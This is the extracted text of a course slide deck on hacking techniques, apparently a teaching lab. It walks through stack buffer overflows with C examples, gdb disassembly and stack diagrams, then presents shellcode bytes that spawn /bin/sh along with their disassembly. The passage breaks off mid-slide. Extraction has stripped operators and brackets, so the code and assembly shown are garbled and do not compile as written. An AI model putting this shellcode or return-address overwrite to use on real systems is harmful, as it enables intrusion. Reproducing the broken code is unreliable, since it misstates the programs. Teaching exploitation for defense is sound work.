Day 2 Labs

1
Day 2 Labs

• Lab 4 Hacking Techniques
• Lab 5 Computer Forensics Analysis

2
Lab 4 Hacking Techniques

• Outlines
• The Threats
• Classes of Attackers
• How they hack in
• Stealth and decoy port scans
• Buffer Overflow
• Examples of remote root exploit through buffer
  overflow
• Examples of remote root exploit through unhandled
  input

3
Lab 4 Hacking Techniques

• Outlines
• Examples of local root exploit through SUID
• Examples of CGI exploit
• Sniffer
• Main-in-the-middle attack by ARP poisoning
• Distributed Denial of Service (DDoS) analysis
• Back door establishment
• Real cases studies

4
Lab 5 Computer Forensics Analysis

• Outlines
• Some basic computer forensics techniques
• On-line inspection
• Surveillance
• Off-line inspection
• Recovery and exam of removed files
• Rootkit analysis

5
Lab 4 Hacking Techniques

• The Threats
• Hacker Technologies
• Internet Engineering
• System Administration
• Network Management
• Reverse Engineering
• Distributing Computing
• Cryptography
• Social Engineering

6
Lab 4 Hacking Techniques

• The Threats
• Hacking Tools become more and more sophisticated
  and powerful in term of
• Efficiency
• Distributing
• Stealth
• Automation
• User friendliness

7
Lab 4 Hacking Techniques

• The Threats

8
Lab 4 Hacking Techniques

• The Threats

9
Lab 4 Hacking Techniques

• The Threats
• These hacking tools could be easily download from
  the Internet gt
• Hacker tool ability increases
• Knowledge of crackers decreases
• Population of crackers increases
• Some day, even elementary school kid may hack
  into your system

10
Lab 4 Hacking Techniques

• The Threats
• Your host does not need to be as famous as yahoo
  or ebay to be targeted
• They need a place to hide their trace
• They need your host as a stepping stone to hack
  other sites
• They need your host resource to carry out their
  activities

11
Lab 4 Hacking Techniques

• The Threats
• Your host security weakness can be identified by
  scan tool
• Security of any network on the Internet depends
  on the security of every other networks
• No network is really secure
• The trends
• Hacking activities become more and more common
• Poor management networks will become the crackers
  playground

12
Lab 4 Hacking Techniques

• Classes of Attackers
• Script-kiddies
• Do not have much skill
• Having a very basic knowledge of networks and OS
• Just download the packaged software and launch
  the attack. Often, they do not even know how the
  software works
• 95 of the population

13
Lab 4 Hacking Techniques

• Classes of Attackers
• Intermediate attackers
• More skilled than script-kiddies
• Having knowledge of UNIX, Windows, networks,
  protocols, and services
• Most of them cannot identify new security holes
  in software and networks

14
Lab 4 Hacking Techniques

• Classes of Attackers
• Expert attackers
• They get their knowledge through work or training
  
• They can identify security holes in a system or
  networks and can write program to exploit these
  weaknesses.
• Most of them do not break the law but they feel
  it is necessary to warn vendors to fix the
  security problems ("proof of concept")

15
Lab 4 Hacking Techniques

• How they hack in
• General Steps
• Locate the victim hosts by some scanning program
• Identify the victim host vulnerability
• Attack the victim host via this vulnerability
• Establish backdoors for later access

16
Lab 4 Hacking Techniques

• How they hack in
• General Steps
• After break-in, use this victim host to
• run sniffer to collect user password information
• hack or attack other network
• use this victim host resource to carry out their
  activities
• Web page defacement for certain assertion
• Some hacking tools can automate the above steps
  (i - iv) into a single command.

17
Lab 4 Hacking Techniques

• Stealth and decoy port scans
• Plain TCP connect () scan
• Stealth Scans TCP SYN, or "half connect ()" scan
• Stealth FIN, Xmas Tree, and Null Scan
• Decoy Scans

18
Lab 4 Hacking Techniques

• Buffer Overflow Exploit
• In general, buffer overflow attack involves the
  following steps
• stuffing more data into a buffer than it can
  handle
• overwrites the return address of a function
• switches the execution flow to the hacker code

19
Lab 4 Hacking Techniques

• Buffer Overflow Exploit
• Process Memory Region

20
Lab 4 Hacking Techniques

• Buffer Overflow Exploit
• Text region
• Fixed by the program
• Includes code (instructions)
• Read only
• Data region
• Contains initialized and uninitialized data
• Static variables are stored here.
• Stack region
• LIFO

21
Lab 4 Hacking Techniques

• Buffer Overflow Exploit --- An example of buffer
  overflow program

22
example1.c source program
Disassembly of example1.c
Dump of assembler code for function
main 0x80483a0 ltmaingt push
ebp 0x80483a1 ltmain1gt mov
esp,ebp 0x80483a3 ltmain3gt push
0x3 0x80483a5 ltmain5gt push
0x2 0x80483a7 ltmain7gt push
0x1 0x80483a9 ltmain9gt call 0x8048398
ltfunctiongt 0x80483ae ltmain14gt add
0xc,esp 0x80483b1 ltmain17gt leave 0x80483b2
ltmain18gt ret 0x80483b3 ltmain19gt
nop 0x80483b4 ltmain20gt nop End of assembler
dump. (gdb) disas function Dump of assembler code
for function function 0x8048398 ltfunctiongt
push ebp 0x8048399 ltfunction1gt mov
esp,ebp 0x804839b ltfunction3gt sub
0x14,esp 0x804839e ltfunction6gt
leave 0x804839f ltfunction7gt ret End of
assembler dump.
void function(int a, int b, int c) char
buffer15 char buffer210 void main()
function(1,2,3)
23
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add
0xc,esp leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
0xbffff9d8
ebp
0xbffff9b8
esp
Bottom of the stack
24
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add
0xc,esp leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
0x3
esp
0xbffff9d8
ebp
0xbffff9b8
Bottom of the stack
25
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add
0xc,esp leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
0x2
esp
0x3
ebp
0xbffff9d8
0xbffff9b8
Bottom of the stack
26
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add
0xc,esp leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
esp
0x1
0x2
0x3
ebp
0xbffff9d8
0xbffff9b8
Bottom of the stack
27
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
lt -- addr 0x80483ae leave ret assembler
code for function push ebp mov
esp,ebp sub 0x14,esp leave ret
esp
Ret (0x80483ae)
0x1
0x2
0x3
ebp
0xbffff9d8
0xbffff9b8
Bottom of the stack
28
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
esp
0xbffff9b8
Ret (0x80483ae)
0x1
0x2
0x3
ebp
0xbffff9d8
0xbffff9b8
Bottom of the stack
29
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
esp
0xbffff9b8
ebp
Ret (0x80483ae)
0x1
0x2
0x3
0xbffff9d8
0xbffff9b8
Bottom of the stack
30
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
esp
Buffer2 0-3
0xbffff990
Buffer2 4-7
Buffer2 8-9
Buffer1 0-3
Buffer1 4
0xbffff9b8
ebp
Ret (0x80483ae)
0x1
0x2
0x3
0xbffff9d8
0xbffff9b8
Bottom of the stack
31
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
Buffer2 0-3
0xbffff990
Buffer2 4-7
Buffer2 8-9
Buffer1 0-3
Buffer1 4
0xbffff9b8
Ret (0x80483ae)
esp
0xbffff9a8
0x1
0x2
0x3
0xbffff9d8
ebp
0xbffff9b8
Bottom of the stack
32
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
Ret (0x80483ae)
0xbffff9a8
esp
0x1
0x2
0x3
0xbffff9d8
ebp
0xbffff9b8
Bottom of the stack
33
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
0x1
0x2
0x3
esp
0xbffff9d8
ebp
0xbffff9b8
Bottom of the stack
34
assembler code for main push ebp mov
esp,ebp push 0x3 push 0x2 push
0x1 call 0x8048398 ltfunctiongt add 0xc,esp
leave ret assembler code for
function push ebp mov esp,ebp sub
0x14,esp leave ret
0xbffff9d8
0xbffff9b8
esp
Ret (0x400349cb)
0xbffff9bc
0x0
ebp
0xbffff9d8
Bottom of the stack
35
example2.c source program
Disassembly of example2.c
void function(char str) char buffer16
strcpy(buffer,str) void main() char
large_string256 int i for( i 0 i lt
255 i) large_stringi 'A'
function(large_string)
Dump of assembler code for function
main 0x80481b8 ltmaingt push
ebp 0x80481b9 ltmain1gt mov
esp,ebp 0x80481bb ltmain3gt sub
0x104,esp 0x80481c1 ltmain9gt nop 0x80481c2
ltmain10gt movl 0x0,0xfffffefc(ebp) 0x80481
cc ltmain20gt lea 0x0(esi,1),esi 0x80481d0
ltmain24gt cmpl 0xfe,0xfffffefc(ebp) 0x804
81da ltmain34gt jle 0x80481e0
ltmain40gt 0x80481dc ltmain36gt jmp
0x80481f8 ltmain64gt 0x80481de ltmain38gt mov
esi,esi 0x80481e0 ltmain40gt lea
0xffffff00(ebp),eax 0x80481e6 ltmain46gt mov
0xfffffefc(ebp),edx 0x80481ec ltmain52gt
movb 0x41,(edx,eax,1) 0x80481f0 ltmain56gt
incl 0xfffffefc(ebp) 0x80481f6 ltmain62gt
jmp 0x80481d0 ltmain24gt 0x80481f8 ltmain64gt
lea 0xffffff00(ebp),eax 0x80481fe
ltmain70gt push eax 0x80481ff ltmain71gt
call 0x80481a0 ltfunctiongt 0x8048204 ltmain76gt
add 0x4,esp 0x8048207 ltmain79gt
leave 0x8048208 ltmain80gt ret
36
example2.c source program
Disassembly of example2.c
void function(char str) char buffer16
strcpy(buffer,str) void main() char
large_string256 int i for( i 0 i lt
255 i) large_stringi 'A'
function(large_string)
Dump of assembler code for function
function 0x80481a0 ltfunctiongt push
ebp 0x80481a1 ltfunction1gt mov
esp,ebp 0x80481a3 ltfunction3gt sub
0x10,esp 0x80481a6 ltfunction6gt mov
0x8(ebp),eax 0x80481a9 ltfunction9gt push
eax 0x80481aa ltfunction10gt lea
0xfffffff0(ebp),eax 0x80481ad ltfunction13gt
push eax 0x80481ae ltfunction14gt call
0x804cf10 ltstrcpygt 0x80481b3 ltfunction19gt add
0x8,esp 0x80481b6 ltfunction22gt
leave 0x80481b7 ltfunction23gt ret End of
assembler dump.
37
assembler code of main push ebp mov
esp,ebp sub 0x104,esp nop movl
0x0,0xfffffefc(ebp) lea
0x0(esi,1),esi cmpl 0xfe,0xfffffefc(ebp) jl
e 0x80481e0 ltmain40gt jmp 0x80481f8
ltmain64gt mov esi,esi lea
0xffffff00(ebp),eax mov 0xfffffefc(ebp),ed
x movb 0x41,(edx,eax,1) incl
0xfffffefc(ebp) jmp 0x80481d0 ltmain24gt lea
0xffffff00(ebp),eax push eax call
0x80481a0 ltfunctiongt add
0x4,esp leave ret
source code of main void main() char
large_string256 int i for( i 0 i lt
255 i) large_stringi 'A'
function(large_string)
0xbffff9e8
ebp
0xbffff9c8
esp
Bottom of the stack
38
source code of main void main() char
large_string256 int i for( i 0 i lt
255 i) large_stringi 'A'
function(large_string)
assembler code of main push ebp mov
esp,ebp sub 0x104,esp nop movl
0x0,0xfffffefc(ebp) // initialize counter i
variable (top of stack) lea
0x0(esi,1),esi //initialize source
index cmpl 0xfe,0xfffffefc(ebp) // test
if i lt 255 jle 0x80481e0 ltmain40gt //
jump to lea instruction below jmp 0x80481f8
ltmain64gt //exit the for loop mov
esi,esi // update the
source index lea 0xffffff00(ebp),eax //
load accumulator with data offset mov
0xfffffefc(ebp),edx // move the i variable to
data register movb 0x41,(edx,eax,1)
//move A char to the data block incl
0xfffffefc(ebp) // i jmp
0x80481d0 ltmain24gt // loop back to the cmpl
instruction above lea 0xffffff00(ebp),eax
// load accumulator with data offset push
eax // push the large_string pointer
to stack call 0x80481a0 ltfunctiongt add
0x4,esp leave ret
i variable
esp
0xbffff8c4
Allocation of large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
ebp
Bottom of the stack
39
assembler code of main push ebp mov
esp,ebp sub 0x104,esp nop movl
0x0,0xfffffefc(ebp) // initialize counter i
variable (top of stack) lea
0x0(esi,1),esi //initialize source
index cmpl 0xfe,0xfffffefc(ebp) // test
if i lt 255 jle 0x80481e0 ltmain40gt //
jump to lea instruction below jmp 0x80481f8
ltmain64gt //exit the for loop mov
esi,esi // update the
source index lea 0xffffff00(ebp),eax //
load accumulator with data offset mov
0xfffffefc(ebp),edx // move the i variable to
data register movb 0x41,(edx,eax,1)
//move A char to the data block incl
0xfffffefc(ebp) // i jmp
0x80481d0 ltmain24gt // loop back to the cmpl
instruction above lea 0xffffff00(ebp),eax
// load accumulator with data offset push
eax // push the large_string pointer
to stack call 0x80481a0 ltfunctiongt add
0x4,esp leave ret
source code of main void main() char
large_string256 int i for( i 0 i lt
255 i) large_stringi 'A'
function(large_string)
esp
0xbffff8c8
i variable
0xbffff8c4
Allocation of large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
ebp
Bottom of the stack
40
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax push eax lea
0xfffffff0(ebp),eax push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
esp
0xbffff9c8
ebp
0xbffff8b8
0x08048204
Ret of main ( )
0xbffff8bc
0xbffff8c8
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
i variable
0xbffff8c4
large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
41
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax push eax lea
0xfffffff0(ebp),eax push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
esp
buffer 16
0xbffff8a8
0xbffff9c8
ebp
0xbffff8b8
Ret of main 0x08048204
0xbffff8bc
0xbffff8c8
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
i variable
0xbffff8c4
large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
42
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
esp
str 0xbffff8c8
0xbffff8a4
buffer 16
0xbffff8a8
ebp value before call 0xbffff9c8
ebp
0xbffff8b8
Ret of main 0x08048204
0xbffff8bc
0xbffff8c8
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
i variable
0xbffff8c4
large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
43
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax // update the accumulator
pointed to buffer16 push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
esp
buffer 0xbffff8a8
0xbffff8a0
str 0xbffff8c8
0xbffff8a4
buffer 16
0xbffff8a8
ebp value before call 0xbffff9c8
ebp
0xbffff8b8
Ret of main 0x08048204
0xbffff8bc
0xbffff8c8
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
i variable
0xbffff8c4
large_string 256
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
44
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax // update the accumulator
pointed to buffer16 push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
esp
buffer 0xbffff8a8
0xbffff8a0
str 0xbffff8c8
0xbffff8a4
0x41
0xbffff8a8
0x41
ebp
0xbffff8b8
0x41
0xbffff8bc
The ret of main() address is overwritten by 0x41
0x41
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
0x41
0xbffff8c4
0x41
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
45
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax // update the accumulator
pointed to buffer16 push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
buffer 0xbffff8a8
0xbffff8a0
str 0xbffff8c8
0xbffff8a4
esp
0x41
0xbffff8a8
0x41
ebp
0xbffff8b8
0x41
0xbffff8bc
The ret of main() address is overwritten by 0x41
0x41
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
0x41
0xbffff8c4
0x41
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
46
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax // update the accumulator
pointed to buffer16 push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret
buffer 0xbffff8a8
0xbffff8a0
str 0xbffff8c8
0xbffff8a4
0x41
0xbffff8a8
0x41
0xbffff8b8
esp
0x41
0xbffff8bc
The ret of main() address is overwritten by 0x41
0x41
str
0xbffff8c0
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
0x41
0xbffff8c4
ebp point to 0x41414141
0x41
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
47
assembler code of function push ebp mov
esp,ebp sub 0x10,esp mov
0x8(ebp),eax // update the accumulator
pointed to str push eax lea
0xfffffff0(ebp),eax // update the accumulator
pointed to buffer16 push eax call
0x804cf10 ltstrcpygt add 0x8,esp leave ret Th
e return of function leads to segmentation fault
buffer 0xbffff8a8
0xbffff8a0
str 0xbffff8c8
0xbffff8a4
0x41
0xbffff8a8
0x41
0xbffff8b8
0x41
0xbffff8bc
The ret of main() address is overwritten by 0x41
0x41
str
0xbffff8c0
0x41
0xbffff8c4
source code of function void function(char str)
char buffer16 strcpy(buffer,str)
ebp point to 0x41414141
0x41
0xbffff8c8
0xbffff9e8
0xbffff9c8
Bottom of the stack
48
example3.c source program
Disassembly of example3.c
void function(int a, int b, int c) char
buffer15 char buffer210 int ret
ret buffer1 12 (ret) 8 void
main() int x x 0 function(1,2,3)
x 1 printf("d\n",x)
Dump of assembler code for function
main 0x80483e8 ltmaingt push
ebp 0x80483e9 ltmain1gt mov
esp,ebp 0x80483eb ltmain3gt sub
0x4,esp 0x80483ee ltmain6gt movl
0x0,0xfffffffc(ebp) 0x80483f5 ltmain13gt
push 0x3 0x80483f7 ltmain15gt push
0x2 0x80483f9 ltmain17gt push
0x1 0x80483fb ltmain19gt call 0x80483c8
ltfunctiongt 0x8048400 ltmain24gt add
0xc,esp 0x8048403 ltmain27gt movl
0x1,0xfffffffc(ebp) 0x804840a ltmain34gt mov
0xfffffffc(ebp),eax 0x804840d ltmain37gt
push eax 0x804840e ltmain38gt push
0x8048470 0x8048413 ltmain43gt call
0x8048308 ltprintfgt 0x8048418 ltmain48gt add
0x8,esp 0x804841b ltmain51gt leave 0x804841c
ltmain52gt ret
49
example3.c source program
Disassembly of example3.c
void function(int a, int b, int c) char
buffer15 char buffer210 int ret
ret buffer1 12 (ret) 8 void
main() int x x 0 function(1,2,3)
x 1 printf("d\n",x)
Dump of assembler code for function
function 0x80483c8 ltfunctiongt push
ebp 0x80483c9 ltfunction1gt mov
esp,ebp 0x80483cb ltfunction3gt sub
0x18,esp 0x80483ce ltfunction6gt lea
0xfffffff8(ebp),eax 0x80483d1 ltfunction9gt lea
0xc(eax),ecx 0x80483d4 ltfunction12gt
mov ecx,0xffffffe8(ebp) 0x80483d7
ltfunction15gt mov 0xffffffe8(ebp),eax
0x80483da ltfunction18gt mov
0xffffffe8(ebp),edx 0x80483dd ltfunction21gt
mov (edx),ecx 0x80483df ltfunction23gt
add 0x8,ecx 0x80483e2 ltfunction26gt
mov ecx,(eax) 0x80483e4 ltfunction28gt
leave 0x80483e5 ltfunction29gt ret
50
assembler code of main push ebp mov
esp,ebp sub 0x4,esp movl
0x0,0xfffffffc(ebp) push 0x3 push
0x2 push 0x1 call 0x80483c8
ltfunctiongt add 0xc,esp movl
0x1,0xfffffffc(ebp) mov 0xfffffffc(ebp),ea
x push eax push 0x8048470 call
0x8048308 ltprintfgt add 0x8,esp leave ret
source code of main void main() int x x
0 function(1,2,3) x 1
printf("d\n",x)
0xbffff958
ebp
0xbffff938
esp
Bottom of the stack
51
assembler code of main push ebp mov
esp,ebp sub 0x4,esp movl
0x0,0xfffffffc(ebp) push 0x3 push
0x2 push 0x1 call 0x80483c8
ltfunctiongt add 0xc,esp movl
0x1,0xfffffffc(ebp) mov 0xfffffffc(ebp),ea
x push eax push 0x8048470 call
0x8048308 ltprintfgt add 0x8,esp leave ret
source code of main void main() int x x
0 function(1,2,3) x 1
printf("d\n",x)
x variable
esp
0xbffff934
0xbffff958
ebp
0xbffff938
Bottom of the stack
52
assembler code of main push ebp mov
esp,ebp sub 0x4,esp // allocate x
variable in the stack movl 0x0,0xfffffffc(ebp
) // initialize x variable push 0x3 //
passing arguments to function via stack push
0x2 push 0x1 call 0x80483c8
ltfunctiongt add 0xc,esp movl
0x1,0xfffffffc(ebp) mov 0xfffffffc(ebp),ea
x push eax push 0x8048470 call
0x8048308 ltprintfgt add 0x8,esp leave ret
source code of main void main() int x x
0 function(1,2,3) x 1
printf("d\n",x)
esp
1 2 3
0xbffff928
x variable 0
0xbffff934
0xbffff958
ebp
0xbffff938
Bottom of the stack
53
assembler code of main push ebp mov
esp,ebp sub 0x4,esp // allocate x
variable in the stack movl 0x0,0xfffffffc(ebp
) // initialize x variable push 0x3 //
passing arguments to function via stack push
0x2 push 0x1 call 0x80483c8
ltfunctiongt add 0xc,esp movl
0x1,0xfffffffc(ebp) mov 0xfffffffc(ebp),ea
x push eax push 0x8048470 call
0x8048308 ltprintfgt add 0x8,esp leave ret
source code of main void main() int x x
0 function(1,2,3) x 1
printf("d\n",x)
Return addr of main ( ) 0x08048400
esp
0xbffff924
1 2 3
0xbffff928
x variable 0
0xbffff934
0xbffff958
ebp
0xbffff938
Bottom of the stack
54
assembler code of functioin push ebp mov
esp,ebp sub 0x18,esp // allocate
buffer1,2 and ret variable lea
0xfffffff8(ebp),eax lea 0xc(eax),ecx mov
ecx,0xffffffe8(ebp) mov
0xffffffe8(ebp),eax mov 0xffffffe8(ebp),ed
x mov (edx),ecx add 0x8,ecx mov
ecx,(eax) leave ret
esp
ret variable
0xbffff904
0xbffff908
buffer20-3
buffer24-7
buffer28-9
0xbffff918
buffer10-3
buffer14
0xbffff938
ebp
0xbffff920
Return addr of main ( ) 0x08048400
0xbffff924
source code of function void function(int a, int
b, int c) char buffer15 char
buffer210 int ret ret buffer1 12
(ret) 8
1 2 3
0xbffff928
x variable 0
0xbffff934
0xbffff958
0xbffff938
Bottom of the stack
55
assembler code of functioin push ebp mov
esp,ebp sub 0x18,esp // allocate
buffer1,2 and ret variable lea
0xfffffff8(ebp),eax // make ax points to
buffer1 lea 0xc(eax),ecx // make cx
points be buffer1 12,
i.e stack location store the return
address of main ( ) mov
ecx,0xffffffe8(ebp) //store the cx result to
ret variable mov 0xffffffe8(ebp),eax
//load the ret variable to ax mov
0xffffffe8(ebp),edx //load the ret variable
to dx mov (edx),ecx // load the
return address of main ( ) to cx add
0x8,ecx // add 8 to cx mov
ecx,(eax) // overwrite the return address
of main ( ) leave ret
esp
ret variable 0xbffff924
0xbffff908
0xbffff904
buffer20-3
buffer24-7
buffer28-9
0xbffff918
buffer10-3
buffer14
0xbffff938
ebp
0xbffff920
Return addr of main ( ) 0x08048400
0xbffff924
1 2 3
0xbffff928
source code of function void function(int a, int
b, int c) char buffer15 char
buffer210 int ret ret buffer1 12
(ret) 8
x variable 0
0xbffff934
0xbffff958
0xbffff938
Bottom of the stack
56
assembler code of functioin push ebp mov
esp,ebp sub 0x18,esp // allocate
buffer1,2 and ret variable lea
0xfffffff8(ebp),eax // make ax points to
buffer1 lea 0xc(eax),ecx // make cx
points be buffer1 12,
i.e stack location store the return
address of main ( ) mov
ecx,0xffffffe8(ebp) //store the cx result to
ret variable mov 0xffffffe8(ebp),eax
//load the ret variable to ax mov
0xffffffe8(ebp),edx //load the ret variable
to dx mov (edx),ecx // load the
return address of main ( ) to cx add
0x8,ecx // add 8 to cx mov
ecx,(eax) // overwrite the return address
of main ( ) leave ret
esp
ret variable 0xbffff924
0xbffff908
0xbffff904
buffer20-3
buffer24-7
buffer28-9
0xbffff918
buffer10-3
buffer14
0xbffff938
ebp
0xbffff920
Return addr of main ( ) 0x08048408
0xbffff924
1 2 3
0xbffff928
source code of function void function(int a, int
b, int c) char buffer15 char
buffer210 int ret ret buffer1 12
(ret) 8
x variable 0
0xbffff934
0xbffff958
0xbffff938
Bottom of the stack
57
assembler code of main 0x80483e8 ltmaingt
push ebp 0x80483e9 ltmain1gt mov
esp,ebp 0x80483eb ltmain3gt sub
0x4,esp 0x80483ee ltmain6gt movl
0x0,0xfffffffc(ebp) 0x80483f5 ltmain13gt
push 0x3 0x80483f7 ltmain15gt push
0x2 0x80483f9 ltmain17gt push
0x1 0x80483fb ltmain19gt call 0x80483c8
ltfunctiongt 0x8048400 ltmain24gt add
0xc,esp // original return point
after call, adjust the stack pointer for the
passing arguments 0x8048403 ltmain27gt movl
0x1,0xfffffffc(ebp) // assign 1 to variable
x 0x804840a ltmain34gt mov
0xfffffffc(ebp),eax // the actual return
point after call, load the variable x to
ax 0x804840d ltmain37gt push eax
// pass the value x to
printf via stack 0x804840e ltmain38gt push
0x8048470 0x8048413 ltmain43gt call
0x8048308 ltprintfgt 0x8048418 ltmain48gt add
0x8,esp // adjust the stack pointer for
passing arguments 0x804841b ltmain51gt
leave 0x804841c ltmain52gt ret
58
testsc.c source program
Disassembly of testsc.c
char shellcode "\xeb\x2a\x5e\x89\x76\x08\x
c6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\
x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00
\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\
xc3" void main() int ret ret (int
)ret 2 (ret) (int)shellcode
Dump of assembler code for function
main 0x8048398 ltmaingt push
ebp 0x8048399 ltmain1gt mov
esp,ebp 0x804839b ltmain3gt sub
0x4,esp 0x804839e ltmain6gt lea
0xfffffffc(ebp),eax 0x80483a1 ltmain9gt lea
0x8(eax),edx 0x80483a4 ltmain12gt mov
edx,0xfffffffc(ebp) 0x80483a7 ltmain15gt mov
0xfffffffc(ebp),eax 0x80483aa ltmain18gt
movl 0x8049440,(eax) 0x80483b0 ltmain24gt
leave 0x80483b1 ltmain25gt ret 0x80483b2
ltmain26gt nop
59
testsc.c source program
Disassembly of shellcode
(gdb) disas 0x8049440 Dump of assembler code for
function shellcode 0x8049440 ltshellcodegt jmp
0x804946c ltshellcode44gt 0x8049442
ltshellcode2gt pop esi 0x8049443
ltshellcode3gt mov esi,0x8(esi) 0x8049
446 ltshellcode6gt movb
0x0,0x7(esi) 0x804944a ltshellcode10gt
movl 0x0,0xc(esi) 0x8049451 ltshellcode17gt
mov 0xb,eax 0x8049456 ltshellcode22gt
mov esi,ebx 0x8049458 ltshellcode24gt
lea 0x8(esi),ecx 0x804945b ltshellcode27gt
lea 0xc(esi),edx 0x804945e
ltshellcode30gt int 0x80 0x8049460
ltshellcode32gt mov 0x1,eax 0x8049465
ltshellcode37gt mov 0x0,ebx 0x804946a
ltshellcode42gt int 0x80 0x804946c
ltshellcode44gt call 0x8049442
ltshellcode2gt 0x8049471 ltshellcode49gt
das 0x8049472 ltshellcode50gt bound
ebp,0x6e(ecx) 0x8049475 ltshellcode53gt
das 0x8049476 ltshellcode54gt jae
0x80494e0 lt_DYNAMIC48gt 0x8049478 ltshellcode56gt
add cl,0xc35dec(ecx) 0x804947e
ltshellcode62gt add al,(eax)
char shellcode "\xeb\x2a\x5e\x89\x76\x08\x
c6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\
x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00
\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\
xc3" void main() int ret ret (int
)ret 2 (ret) (int)shellcode
60
assembler code of main push ebp mov
esp,ebp sub 0x4,esp lea
0xfffffffc(ebp),eax lea 0x8(eax),edx mov
edx,0xfffffffc(ebp) mov 0xfffffffc(ebp),ea
x movl 0x8049440,(eax) leave ret nop
source code of main void main() int ret
ret (int )ret 2 (ret)
(int)shellcode
esp
ret variable
0xbffff984
0xbffff9a8
ebp
0xbffff988
0x400359cb
0xbffff98c
Return address
Bottom of the stack
61
source code of main void main() int ret
ret (int )ret 2 (ret)
(int)shellcode
assembler code of main push ebp mov
esp,ebp sub 0x4,esp lea
0xfffffffc(ebp),eax // load ax from ret value
lea 0x8(eax),edx // offset two
address and load to dx mov edx,0xfffffffc(ebp
) // update the ret variable in the stack mov
0xfffffffc(ebp),eax movl 0x8049440,(eax) lea
ve ret nop
esp
ret variable 0xbffff98c
0xbffff984
0xbffff9a8
ebp
0xbffff988
0x400359cb
0xbffff98c
Return address
Bottom of the stack
62
source code of main void main() int ret
ret (int )ret 2 (ret)
(int)shellcode
assembler code of main push ebp mov
esp,ebp sub 0x4,esp lea
